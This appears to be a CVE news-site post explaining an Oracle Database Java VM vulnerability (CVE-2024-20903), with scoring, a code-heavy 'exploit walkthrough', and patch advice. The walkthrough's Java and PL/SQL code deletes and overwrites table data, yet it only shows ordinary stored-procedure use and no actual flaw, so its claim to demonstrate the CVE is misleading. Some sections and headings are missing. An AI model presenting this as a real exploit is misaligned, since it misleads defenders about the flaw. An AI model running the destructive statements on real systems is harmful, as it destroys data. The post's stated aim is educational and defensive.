CVE CyberSecurity Database News

CVE-2024-20903 - Exploiting Java VM in Oracle Database Server – A Hands-On Explainer

Poster -

In January 2024, Oracle disclosed a new vulnerability—CVE-2024-20903—located in the Java VM component of the Oracle Database Server, impacting versions 19.3 through 19.21 and 21.3 through 21.12. This security flaw allows attackers with limited privileges (just CREATE SESSION and CREATE PROCEDURE) to tamper with or even destroy critical data available to the Java VM, all through a network connection.

The Common Vulnerability Scoring System (CVSS) assigns this bug a base score of 6.5, driven by the integrity impact: an attacker can manipulate data, but cannot view or leak confidential information. This post will unpack how CVE-2024-20903 works, show a simplified attack example, cover mitigation, and link to key sources.

Score: 6.5 (Medium)

- Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N

2. How the Exploit Works

This issue allows a low-privileged attacker to run malicious Java code inside the database, thanks to a flaw in the Java VM component. Attackers can weaponize their ability to create Java stored procedures to perform unauthorized actions—like modifying or deleting application data.

Connect to the Oracle Database over the network.

- Have credentials for a low-privileged account, but one granted CREATE SESSION and CREATE PROCEDURE.
- Leverage weaknesses in the Java VM to run Java code in the context of the database, bypassing some expected security controls.

3. Step-by-Step Exploit Walkthrough

Here’s a simplified, educational sequence of actions that could exploit this vulnerability. Do not attempt against production or unauthorized systems.

CREATE PROCEDURE

-- Connect as a user with CREATE PROCEDURE
sqlplus attacker_user/password@host:1521/servicename

Step 2: Create a Malicious Java Class

The attacker creates a Java class that manipulates sensitive tables. For example, the Java code could delete records or alter sensitive configurations.

CREATE OR REPLACE AND COMPILE JAVA SOURCE NAMED "EvilJava" AS
import java.sql.*;
public class EvilJava {
  public static void hack() throws SQLException {
    Connection conn = DriverManager.getConnection("jdbc:default:connection:");
    Statement stmt = conn.createStatement();
    // Example: Delete all users from a critical table
    stmt.executeUpdate("DELETE FROM critical_table");
    // Example: Modify important data
    stmt.executeUpdate("UPDATE configs SET value='hacked' WHERE key='secure'");
    stmt.close();
    conn.close();
  }
};
/

### Step 3: Map a PL/SQL Wrapper to the Java Method

To execute the Java code, create a PL/SQL procedure as a wrapper.

CREATE OR REPLACE PROCEDURE run_evil_code AS
  LANGUAGE JAVA
  NAME 'EvilJava.hack()';
/

Step 4: Launch the Attack

The attacker calls the procedure, triggering the malicious Java logic.

BEGIN
  run_evil_code();
END;
/

Result: Sensitive data is deleted or tampered with—potentially crashing applications or causing data loss.

Multi-tenant databases: One user could sabotage or deface another tenant’s data.

- Test environments: Compromised test accounts might lead to attacks on production, especially if privileges are reused.

5. Mitigation & Patching

Oracle's Advice:
Oracle fixed this in the January 2024 Critical Patch Update.

6. References & More Information

- Oracle Critical Patch Update Advisory - January 2024
- NVD entry for CVE-2024-20903
- Oracle Java in the Database Documentation

7. Summary

CVE-2024-20903 is a serious vulnerability in Oracle Database Server’s Java VM. It lets low-privileged users run malicious Java code, altering or deleting any data their Java code can reach—all over the network and without special interaction. If you’re running affected Oracle Database versions, apply Oracle’s patches ASAP, audit user privileges, and review who can run or create Java code in your database.


Stay secure! Always be proactive with patching, and follow principle of least privilege in your database setups.


*Written just for you, straight to the point and hands-on. If you found this helpful, consider sharing with your DBA or security team!*


*Disclaimer: This post is for educational and defensive purposes only. Do not use this information for unauthorized activity.*

Timeline

Published on: 02/17/2024 02:15:45 UTC